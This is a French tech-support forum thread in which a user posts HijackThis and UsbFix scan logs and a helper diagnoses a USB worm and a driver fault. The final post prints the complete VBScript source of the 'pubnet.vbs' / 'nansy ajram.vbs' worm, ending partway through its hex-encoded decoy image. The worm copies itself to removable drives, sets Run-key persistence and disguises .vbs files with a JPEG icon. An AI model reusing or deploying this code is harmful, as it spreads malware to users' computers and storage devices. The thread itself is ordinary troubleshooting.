O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [YSearchProtection] "C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe"
O4 - HKLM\..\Run: [Pubnet] C:\WINDOWS\system32\pubnet.vbs
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [YSearchProtection] C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
O4 - HKCU\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - HKCU\..\Run: [kamsoft] C:\WINDOWS\system32\ckvo.exe
O4 - HKUS\S-1-5-19\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [ctfmon.exe] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [ctfmon.exe] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" (User 'Default user')
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Download All by FlashGet - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: Download using FlashGet - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Open in new background tab - res://C:\Program Files\Windows Live Toolbar\Components\en-au\msntabres.dll.mui/229?62f47c35613842fc9a8d5a469c559a8c
O8 - Extra context menu item: Open in new foreground tab - res://C:\Program Files\Windows Live Toolbar\Components\en-au\msntabres.dll.mui/230?62f47c35613842fc9a8d5a469c559a8c
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe (file missing)
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe (file missing)
O17 - HKLM\System\CCS\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer = 193.95.66.11,213.150.176.196
O17 - HKLM\System\CCS\Services\Tcpip\..\{C0927E70-C042-466C-A6A0-0488746AE93B}: NameServer = 213.150.176.196 193.95.67.22
O17 - HKLM\System\CS1\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer = 193.95.66.11,213.150.176.196
O17 - HKLM\System\CS2\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer = 193.95.66.11,213.150.176.196
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Service Bonjour (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: ERDAS License Server - Unknown owner - C:\PROGRA~1\ERDASL~1\lmgrd.exe (file missing)
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: MATLAB Server (matlabserver) - Unknown owner - C:\MATLAB701\webserver\bin\win32\matlabserver.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
0
Utilisateur anonyme
24 nov. 2008 à 20:56
Telecharge UsbFix sur ton bureau

--> Lance l installation avec les parametres par default

Branche tes sources de données externes à ton PC, (clé USB, disque dur externe, etc...) suceptible d avoir été infectés sans les ouvrir

--> Double clic sur le raccourci UsbFix sur ton bureau

-->choisi l option 1 (nettoyage)

--> Le pc va redémarer

-->Apres redémarrage post le rapport UsbFix.txt

Note : le rapport UsbFix.txt est sauvegardé a la racine du disque
0
bonjour Chiquitine29,

Je dois vous signaler que depuis quelque temps le mon PC ne detecte plus le lecteur cd et non plus le flash disque. J'espère que vous m'aiderez sur ce point la.

Et voilà le rapport:



-------------- UsbFix V2.413.1 ---------------

* User : THE INDIANS - IND_PC
* Outils mis a jours le 24/11/2008 par Chiquitine29 et Chimay8
* Recherche effectuée à 21:23:06 le 24/11/2008
* Windows Xp - Internet Explorer 7.0.5730.13


--------------- [ Processus actifs ] ----------------


C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\MATLAB701\webserver\bin\win32\matlabserver.exe
C:\WINDOWS\system32\svchost.exe
c:\matlab701\bin\win32\matlab.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\system32\userinit.exe
C:\WINDOWS\system32\ctfmon.exe
C:\DOCUME~1\THEIND~1\LOCALS~1\Temp\1.tmp\b2e.exe

--------------- [ Informations lecteurs ] ----------------

C: - Lecteur fixe

D: - Lecteur fixe


--------------- [ Lecteur C ] ----------------

C: - Lecteur fixe


+- Listing des fichiers présents :

[04/08/2004 03:38][-rahs----] C:\NTDETECT.COM
[31/10/2008 17:26][-r-hs----] C:\xih9.cmd
[10/02/2007 12:18][---hs----] C:\boot.ini
[22/11/2008 18:27][--a------] C:\rapport.txt
[22/11/2008 18:27][--a------] C:\UsbFix.txt
[22/11/2008 18:27][--a------] C:\YServer.txt
[25/11/2006 14:59][--a------] C:\CONFIG.SYS
[25/11/2006 14:59][--a------] C:\hiberfil.sys
[25/11/2006 14:59][--a------] C:\IO.SYS
[25/11/2006 14:59][--a------] C:\MSDOS.SYS
[25/11/2006 14:59][--a------] C:\pagefile.sys

--------------- [ Lecteur D ] ----------------

D: - Lecteur fixe


+- Listing des fichiers présents :


--------------- [ Registre / Startup ] ----------------

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\run]

ctfmon.exe=C:\WINDOWS\system32\ctfmon.exe
swg=C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
YSearchProtection=C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
Messenger (Yahoo!)="C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run]

SunJavaUpdateSched="C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
Adobe Reader Speed Launcher="C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
TkBellExe="C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
YSearchProtection="C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe"
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents=
<NO NAME>=
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL=
Installed=1
<NO NAME>=
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI=
NoChange=1
Installed=1
<NO NAME>=
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS=
Installed=1
<NO NAME>=

--------------- [ Registre / Mountpoint2 ] ----------------

Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{06a96dac-c1f5-11dc-bf8b-0011675d2e6b}\Shell\AutoRun\command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{06a96dac-c1f5-11dc-bf8b-0011675d2e6b}\Shell\explore\Command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{06a96dac-c1f5-11dc-bf8b-0011675d2e6b}\Shell\open\Command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1432ca51-af6a-11dd-80fa-0001805e8b8e}\Shell\AutoRun\command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1432ca51-af6a-11dd-80fa-0001805e8b8e}\Shell\explore\Command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1432ca51-af6a-11dd-80fa-0001805e8b8e}\Shell\open\Command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{3a6d5b5a-b37b-11db-bd4d-0001805e8b8e}\Shell\AutoRun\command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{553585cf-b277-11dd-8115-0001805e8b8e}\Shell\AutoRun\command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c7d41c6-a1e3-11dd-80e1-0001805e8b8e}\Shell\AutoRun\command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6dc5931c-a30a-11dc-bf5e-0001805e8b8e}\Shell\AutoRun\command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6dc5931c-a30a-11dc-bf5e-0001805e8b8e}\Shell\open\Command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a4f5202a-5f01-11dc-bee6-0001805e8b8e}\Shell\AutoRun\command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b90a65e4-1215-11dd-bfed-0001805e8b8e}\Shell\AutoRun\command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b90a65e4-1215-11dd-bfed-0001805e8b8e}\Shell\explore\Command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b90a65e4-1215-11dd-bfed-0001805e8b8e}\Shell\open\Command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ec8a5828-df04-11dc-bfba-0011675d2e6b}\Shell\AutoRun\command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ec8a5828-df04-11dc-bfba-0011675d2e6b}\Shell\explore\Command
Supprimé ! - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ec8a5828-df04-11dc-bfba-0011675d2e6b}\Shell\open\Command

--------------- [ Nettoyage des disques ] ----------------

Supprimé ! - [31/10/2008 17:26][-r-hs----] C:\WINDOWS\system32\ckvo.exe
Supprimé ! - [18/06/2007 16:09][--a------] C:\WINDOWS\system32\pubnet.vbs
Supprimé ! - [22/11/2008 18:24][--a------] C:\WINDOWS\system32\tmp.reg
Supprimé ! - [22/11/2008 18:24][--a------] C:\WINDOWS\system32\tmp.txt
Supprimé ! - [31/10/2008 17:26][-r-hs----] C:\xih9.cmd

--------------- [ Resumé ] ----------------

-> /!\ Le resultat doit etre interprété par un spécialiste /!\

[18/06/2007 16:09][--a------] A:\nansy ajram.vbs
[04/08/2004 03:38][-rahs----] C:\NTDETECT.COM
[10/02/2007 12:18][---hs----] C:\boot.ini

--------------- ! Fin du rapport ! ----------------
0
Utilisateur anonyme
24 nov. 2008 à 22:10
Je dois vous signaler que depuis quelque temps le mon PC ne detecte plus le lecteur cd et non plus le flash disque.


les flash disk n étaient pas branché durant le scan usbfix peux tu recommencer stp
0
Salut chiquitine29,

Pourtant la première fois le flash disque est bien branché. Mais voilà pour tant un autre rapport:



-------------- UsbFix V2.413.1 ---------------

* User : THE INDIANS - IND_PC
* Outils mis a jours le 24/11/2008 par Chiquitine29 et Chimay8
* Recherche effectuée à 22:33:46 le 24/11/2008
* Windows Xp - Internet Explorer 7.0.5730.13


--------------- [ Processus actifs ] ----------------


C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\userinit.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\MATLAB701\webserver\bin\win32\matlabserver.exe
C:\DOCUME~1\THEIND~1\LOCALS~1\Temp\1.tmp\b2e.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
c:\matlab701\bin\win32\matlab.exe

--------------- [ Informations lecteurs ] ----------------

C: - Lecteur fixe

D: - Lecteur fixe


--------------- [ Lecteur C ] ----------------

C: - Lecteur fixe


+- Listing des fichiers présents :

[04/08/2004 03:38][-rahs----] C:\NTDETECT.COM
[10/02/2007 12:18][---hs----] C:\boot.ini
[22/11/2008 18:27][--a------] C:\rapport.txt
[22/11/2008 18:27][--a------] C:\UsbFix.txt
[22/11/2008 18:27][--a------] C:\YServer.txt
[25/11/2006 14:59][--a------] C:\CONFIG.SYS
[25/11/2006 14:59][--a------] C:\hiberfil.sys
[25/11/2006 14:59][--a------] C:\IO.SYS
[25/11/2006 14:59][--a------] C:\MSDOS.SYS
[25/11/2006 14:59][--a------] C:\pagefile.sys

--------------- [ Lecteur D ] ----------------

D: - Lecteur fixe


+- Listing des fichiers présents :


--------------- [ Registre / Startup ] ----------------

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\run]

ctfmon.exe=C:\WINDOWS\system32\ctfmon.exe
swg=C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
YSearchProtection=C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
Messenger (Yahoo!)="C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run]

SunJavaUpdateSched="C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
Adobe Reader Speed Launcher="C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
TkBellExe="C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
YSearchProtection="C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe"
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents=
<NO NAME>=
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL=
Installed=1
<NO NAME>=
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI=
NoChange=1
Installed=1
<NO NAME>=
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS=
Installed=1
<NO NAME>=

--------------- [ Registre / Mountpoint2 ] ----------------


-> Recherche négative.

--------------- [ Nettoyage des disques ] ----------------


--------------- [ Resumé ] ----------------

-> /!\ Le resultat doit etre interprété par un spécialiste /!\

[18/06/2007 16:09][--a------] A:\nansy ajram.vbs
[04/08/2004 03:38][-rahs----] C:\NTDETECT.COM
[10/02/2007 12:18][---hs----] C:\boot.ini

--------------- ! Fin du rapport ! ----------------
0
Utilisateur anonyme
24 nov. 2008 à 22:42
le lecteur A c est quoi .?
0
c'est le Lecteur disquette
0
Utilisateur anonyme
24 nov. 2008 à 22:50
oki


dans cette disquette tu as : nansy ajram.vbs

tu connais ce fichier ??
0
Utilisateur anonyme
24 nov. 2008 à 23:03
ok

dis moi quand tu branches une cé usb il se passe quoi ???

explique précisément stp
0
une fois le flash est branché un message apparait qui est le suivant "l'un des périphériques USB relier a cette ordinateur a mal fonctionné et Windows ne le connais pas" puis je clique sur le message pour apparait un autre ou il s'affiche l'emplacement du périphérique et une recommandation qui est la suivante "Essayer de reconnecter le périphérique. si Windows ne le connais pas toujours remplacer le".

A signaler que j'ai essayé avec un autre port USB est c'est la même chose qui se produit.
Puis ma souris marche très bien pour tant qu'elle est a port USB.
0
Utilisateur anonyme
24 nov. 2008 à 23:26
t as souris marche car elle n a pas de memoire


c est a dire elle n est pas infecté


si tu branche une clé tu as ce message ok mais cette clé apparait dans post de travail ??

dis moi quoi


je vais au dodo

à+
0
Dans le poste du travail ne s'affiche ni le lecteur cd ni même cette clé mais le lecteur disquette apparait et fonction.

Aller bon nuit et merci pour tous les renseignements.

A bientot
0
Utilisateur anonyme
25 nov. 2008 à 10:38
hello

pour moi c est un probleme de pilote

va dans panneau de configuration \ gestionnaire de priférique

regarde si tu as des point d exclamation jaune
0
bonjour,

Exactement j'ai un point d'exclamation jaune sur le lecteur cd.

Et quand je branche le flash un connecteur USB est afficher comme périphérique inconnu.

J'ai essayer déja d'installer le pilote mais je me suis pas arriver!!

Que dois-je faire s'il vous plait?
0
'on error resume next
demarrage = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System"
demarrag = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Pubnet"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSSH = CreateObject("Wscript.shell")
Set xx = FSO.GetSpecialFolder(1)
Set yy = FSO.GetSpecialFolder(1)
dim fso,codeintegral
Set fso = CreateObject("Scripting.FileSystemObject")
entrer
sub entrer()
ss = cstr(xx)
location = wscript.scriptfullname
if instr(location,ss)=false then
diversion2
else
do while time <> "00:00:00"
detecterracines
wscript.sleep 40000
loop
end if
detecterracines

if (fso.fileexists(xx & "\pubnet.vbs")) then
else
copiermessage xx,"pubnet"
DemarrerDe xx
Demar yy
changericone
wssh.run xx & "\pubnet.vbs"
end if
end sub

sub detecterracines()
Dim fso, d, dc, s, n
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
For Each d in dc
racine = d.Driveletter & ":"
u= detectamovibles(racine)
'msgbox racine
if u ="Amovible" and d.isready then

if not (fso.fileexists(racine & "\nansy ajram.vbs")) then
copiermessage racine,"nansy ajram"
end if
end if
Next
end sub
Function detectamovibles(drvpath)
Dim fso, d, s, t
Set fso = CreateObject("Scripting.FileSystemObject")

Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(drvpath)))
Select Case d.DriveType
Case 0: t = "Inconnu"
Case 1: t = "Amovible"
Case 2: t = "Fixe"
Case 3: t = "Rseau"
Case 4: t = "CD-ROM"
Case 5: t = "RAM Disk"
End Select

detectamovibles = t
End Function
sub ChangerIcone()
dim resultat
resultat = wssh.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\")
wssh.Regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",resultat
end sub

sub Demar(Location)
set wssh = CreateObject("WScript.Shell")
wssh.regwrite demarrage,location & "\shutdown.exe -a"
end sub

sub DemarrerDe(Location)
set wssh = CreateObject("WScript.Shell")
wssh.regwrite demarrag,location & "\pubnet.vbs"
end sub

sub copiermessage(x,name)
File = Wscript.ScriptFullName
fso.copyfile file ,x & "\" & name & ".vbs"
end sub

sub diversion2()
Dim fso, f, f2, ts, ts2
Dim Ligne, i
Set FSO = CreateObject("Scripting.FileSystemObject")
if (fso.fileexists(xx & "\nansy.jpg")) then
wssh.run xx & "\nansy.jpg"
else
Set f = fso.GetFile(WScript.ScriptFullName)
Set ts = f.OpenAsTextStream(1, -2)
fso.CreateTextFile xx & "\nansy.jpg"

Set f2 = fso.GetFile(xx & "\nansy.jpg")
Set ts2 = f2.OpenAsTextStream(2, -2)
for i=1 to 116
ts.skipline
next
do
Ligne = ts.readline
For i=2 to Len(Ligne) step 2
ts2.write chr( "&h" & mid(Ligne,i,2))
Next

loop until ts.AtEndOfStream
ts.Close
ts2.Close
wssh.run xx & "\nansy.jpg"
end if
end sub


'FFD8FFE000104A46494600010101004800480000FFDB0043000503040404030504040405050506070C08070707070F0B0B090C110F1212110F111113161C1713141A1511111821181A1D1D1F1F1F13172224221E241C1E1F1EFFDB0043010505050706070E08080E1E1411141E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1E1EFFC000110801DF014C03012200021101031101FFC4001F0000010501010101010100000000000000000102030405060708090A0BFFC400B5100002010303020403050504040000017D01020300041105122131410613516107227114328191A1082342B1C11552D1F02433627282090A161718191A25262728292A3435363738393A434445464748494A535455565758595A636465666768696A737475767778797A838485868788898A92939495969798999AA2A3A4A5A6A7A8A9AAB2B3B4B5B6B7B8B9BAC2C3C4C5C6C7C8C9CAD2D3D4D5D6D7D8D9DAE1E2E3E4E5E6E7E8E9EAF1F2F3F4F5F6F7F8F9FAFFC4001F0100030101010101010101010000000000000102030405060708090A0BFFC400B51100020102040403040705040400010277000102031104052131061241510761711322328108144291A1B1C109233352F0156272D10A162434E125F11718191A262728292A35363738393A434445464748494A535455565758595A636465666768696A737475767778797A82838485868788898A92939495969798999AA2A3A4A5A6A7A8A9AAB2B3B4B5B6B7B8B9BAC2C3C4C5C6C7C8C9CAD2D3D4D5D6D7D8D9DAE2E3E4E5E6E7E8E9EAF2F3F4F5F6F7F8F9FAFFDA000C03010002110311003F00F9A7C6935A7FC24BAC8F2B9FB4CDFF002C87F78571E58E7818078E98AE8BC6DFF2336B3FF5F52FFE842B9DA16A50CC10697E9D29AC714BBB8A04397BFD29FBCECC0A6A9C8A7AE3033EB4CB45980E4A86E98ADBD3132C029C0CD62C087209E99ADCD357E65D9EB58B3B29F43ACD2D36AAE5B2C4E0D745699C7C9DAB9FD3B25547439AE86C5B1C30E3F9572D467A944D3B660464FE35A3060E00E3DFD2B3E0200C673C641ABB01666523A77AE59AD0EF8EC6BDBAE5473B7FAD5D8959581238F5AAD6FB7673D715A109000DB9CE38C5724D96B7342D082A36F5AD6B6385E7A563DAB30C7DECF7CD5FB79C00A075AE7714C7236ED8A9515AB679CF233C562DA49B806FCEB5ED59C9518C8CD64D11736EC8747CE3FD9AD280EE39038CF4ACCB567036BAE3B8FA5694320DA171C54AD0CE4AC5E56CBA8DBB7DAAD4470A79C7354610148C73EF5781C803D6B68EC63324326D5FBDB89E01A686F97F9D318020E7B52336246CF4029B762121C19F27F4A6A81E6654E17B52447938FBA79A739C0E066A632BBD46F4039E703BF5A4F9A8C1119673CFA53509642474AB71D04D5C7718271923AD317001217683CE29ED95193CF1D69A8A4A1C753D2A6435A0B18DC0B1EB48C7E520D212550B7F7783487E6C7A0E0D4B572D211F0000BD31CD3255DDB40E944A98600FD4535F18C819CF159752F602C550EDE9504880FCC7AE2AC7380A17A8A85890793D7B55D877B2673DADA2BC4FCE3BFE75F3D7C628312FCEFC0DC6BE89D65375B938C632715F3D7C689D5E100FDE0A40AF47037F6A8E6ABF09E057D09377845206738F5A8EFEF555C12BB5CAE063A0ED56E499629E5B875DCB1AF4F5278FEB5852869643BB8C9E4FF76BF49A75E584C12545EB33E76A7BCF6219D8E13FBBC81EFEF5EC1F04D3FE295B9FFAFD6FFD171D7912451BB95DFF00228EBEB5ED3F04D42F852E006C0FB6B63FEFDC75F3B52EE6DC9DD8EDA1E61E35FF00919B59FF00AFA97FF425AE68E7271EA6BA6F1AE3FE125D6B3FF3F52FF315CDF01B03D2B144116093CD2E7B53A4EA6910E290AC3D067BE054B0608209EFC0A88AF19F4A9EDC00A73DC66A91A415CB5130DE1477E2B72C188DB8ED5836C77642F5ADCD28282A57B1E6B2968765349B3ABD349D8A18640EB5D0DA47941B9793D6B034D5E037AD74169BB827A015C354F4E89A76E0E00DB802B4ED828C7191FC3F4ACEB6E31EF5AB69103858FA1EBF5AE59BB23D08EC685A9008C2E33C56A5A0DB93546D801823A1EBF5AD0B60A4F4CF35CB257197513F7591D0F356A0E555719AAD16586301067BD5945DB8202E3D45676D4669DA4849185C638AD8B770597D6B06263B862B5ACD8EE5C8CE6B39C497A6A7416472D5AD180460E3915856727BF20E3E95B11BB14191B8FAD656644CB90C8CDF38E9D39EB57A2E464F4AA16C18B02ED85F4AB71101B6EECF3C56B1BDF421961CB0518E99A362B0A44C0600F734C1952076CD3B3BEA6448AA370619E38E294632738EBF8D315B3920639E94BD3E62BBDA934262282777A6695411823B1CD19DFCEDFC28C63EEAE3D2A92D02E21DC555BF1A4E0F1D8F34F5193FCE91811D3F1A56B212642C147D4F029426D4F94E3D6964DBBC7D6932031C54A3543251B9D093B80A242A57EF60E7A5121C8351282D192D516D4BDC70DA381C1F5F7A8E52C10971D3BD48A57200E98E6992AEEC31EC702AA3F1113764616BAC8B68F93F7457CDFF00186532DE32A92BF2F4AFA1FC48DFBA258EDEB91ED5F337C5F940D69829C8618AF672CA6DD6499CD5A4BD9B3C835192312E0A9219BF84E0135937720662033120E30474F6AB17D705279D532431E48AA01F9046E3EEDD6BEBF178D4E8AA4B5F91E1A49B132C8727823B57AEFC1725BC2F74CDD4DEB7FE8B8EBC80E59B2DD7757AEFC171FF0014B5C7FD7EB7FE8095E4F4264709E348A4FF0084975A3E549FF1F52F4047F10AE61B8382083EF5DA78CB54B43E23D6008B27ED530CF1D770AE31F1D8639A9206F1CE6840A45281934BC0E69DBA82DC50A3B54E80B1017FBB5102A70338A7B76CB714EFD8D55D16AD9707279AE934A8D1903B26081903DAB9CB600B2ED6CAD74DA41C2818CF3594F53A6923A5D357E55239CF6ADEB356DBD31585A73E07CAB8ADDB37CE368CFE38E6B8EA47A9EAD37634ED94E406E09ED5BB620E061776062B2AC53CC65707A7046ECD7456F0F0B8E82B92A1D6A4AC5B8A16640718AB318C0C28C8039FAD2DB8F941A9C20C126B964ADB8D49DC75B7284B1E3D2AEC640036F4C71554212063A62A4425579E9DE9686B6B97AD892DCF5AD5B1009E3A66B2A027E43FC5FC55A568C323B9CF5AC67A3265B1B56BF2E7DF8AD7B26C0008DC7D6B0AD186F3B8657BD6D5BB6107EEF26B36448D584FF0EDC7357204EAA7E604F5AA168C5970060D5F81CE719C71CD5A3396C4D852D80BC014C6C9E02E00E69DFC7B71F8D3994E7E538A662D8C5048C9A50A48F97A53C2AE31BB24F5A6F0CC1476A971D457055C303FC3412C01C8DC33C1A7CA30425478CBFD0509B101E0120FE148C49033E94E21719CE076FAD34EE319C9CD2EA52B588B2B8C9E948CC31D3229C2300A9ED48AA32D8A19B27A0C6DACA71F291CE69B17CCBF37CFEA7DA9CCB9534F541B892338C5483D5118DDBB6A8C0EA29976C4201B7BF23DFD6AC26C2E5C9E8718A4B958F6E09C15E95D586A0EA545132A92B2388F13B84B7209CB60FE15F2F7C579D57529656E7B67E95F4DF8D5846304E72A4D7C8FF156E8F9B20FEFCADFD6BE82953F6389714735495E8B679A5CB723071FFEB3510DCDC633FED52CE72577F6A68CEEF94678AEA678D763C718006457B0FC178B1E17B9F97ADEB1FF00C871D790AB294031B1F3C0F5AF5AF831232F85AE1738C5EB0FFC71296961C923CBBC5C4FFC253AB81F29FB74DF8FCE6B307DDE4FCD9E95A9E2B0BFF094EAE4F6BE987FE3E6B3